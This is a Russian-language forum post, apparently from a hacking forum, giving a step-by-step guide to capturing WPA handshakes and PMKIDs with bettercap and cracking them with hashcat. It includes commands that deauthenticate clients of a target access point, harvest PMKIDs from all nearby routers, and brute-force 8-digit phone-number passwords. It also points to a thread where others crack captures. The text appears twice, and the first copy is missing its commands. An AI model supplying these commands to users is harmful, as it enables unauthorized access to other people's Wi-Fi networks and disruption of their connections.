Решил обновить свою статью за 2018 год (/threads/28016/). Для этого нам понадобиться bettercap и hashcat.
Хочу сразу заметить что должно работать как на Win, MacOS и Linux. Я пробовал на MacOS но буду показывать вам на моём
любимом Kali линукс. Ещё понадобиться WiFi-карта которая поддерживает режим монитора и инъекцию пакетов
(TP-Link или на новых ноутбуках с macOS встроенный интерфейс WiFi
И так начнём, первым делом ставим нужные пакеты:
Остановим NetworkManager:
Запустим bettercap:
Переведём интерфейс в режим мониторинга и покажем отсортированные сети:
Сейчас мы хотим заставить одну или несколько клиентских станций отключиться, подделав поддельные пакеты деаутентификации.
При новом подключении bettercap захватит необходимые кадры EAPOL рукопожатия, которые мы позже передадим hashcat для взлома
(замените e0:xx:xx:xx:xx:xxна BSSID вашей целевой точки доступа):
Можно ещё как вариант сделат чтобы все уязвимые маршрутизаторы поблизости начнут отправлять вам PMKID:
Если вы все правильно сделали то у вас должен появится файл /root/bettercap-wifi-handshakes.pcap, потом идём на страницу
и загружаем наши хендшейки туда, на выходе получаем файл с названием bettercap-wifi-handshakes.hc22000 .
И тут есть маленький лайфхак, в странах бывшего СНГ и не только ставится номер телефона (8 цифр) как пароль от Wi-Fi.
Пробуем подобрать пароль с hashcat:
(Если не получилось с hashcat идём в этот топик /threads/65030/ и постим файл bettercap-wifi-handshakes.pcap и ждём)
Пробуйте, если есть варианты по лучше отписываетесь тут, Удачи!!!
Хочу сразу заметить что должно работать как на Win, MacOS и Linux. Я пробовал на MacOS но буду показывать вам на моём
любимом Kali линукс. Ещё понадобиться WiFi-карта которая поддерживает режим монитора и инъекцию пакетов
(TP-Link или на новых ноутбуках с macOS встроенный интерфейс WiFi
en0 уже поддерживает эту технологию).И так начнём, первым делом ставим нужные пакеты:
sudo updatesudo apt install bettercap hashcatОстановим NetworkManager:
sudo airmon-ng check killЗапустим bettercap:
sudo bettercap -iface wlan0Переведём интерфейс в режим мониторинга и покажем отсортированные сети:
wifi.recon onset wifi.show.sort clients descset ticker.commands 'clear; wifi.show'ticker onСейчас мы хотим заставить одну или несколько клиентских станций отключиться, подделав поддельные пакеты деаутентификации.
При новом подключении bettercap захватит необходимые кадры EAPOL рукопожатия, которые мы позже передадим hashcat для взлома
(замените e0:xx:xx:xx:xx:xxна BSSID вашей целевой точки доступа):
wifi.deauth e0:xx:xx:xx:xx:xxМожно ещё как вариант сделат чтобы все уязвимые маршрутизаторы поблизости начнут отправлять вам PMKID:
wifi.assoc allЕсли вы все правильно сделали то у вас должен появится файл /root/bettercap-wifi-handshakes.pcap, потом идём на страницу
hXXps://hashcat.net/cap2hashcat/и загружаем наши хендшейки туда, на выходе получаем файл с названием bettercap-wifi-handshakes.hc22000 .
И тут есть маленький лайфхак, в странах бывшего СНГ и не только ставится номер телефона (8 цифр) как пароль от Wi-Fi.
Пробуем подобрать пароль с hashcat:
hashcat -show -m22000 -a3 -w3 bettercap-wifi-handshakes.hc22000 '?d?d?d?d?d?d?d?d'(Если не получилось с hashcat идём в этот топик /threads/65030/ и постим файл bettercap-wifi-handshakes.pcap и ждём)
Пробуйте, если есть варианты по лучше отписываетесь тут, Удачи!!!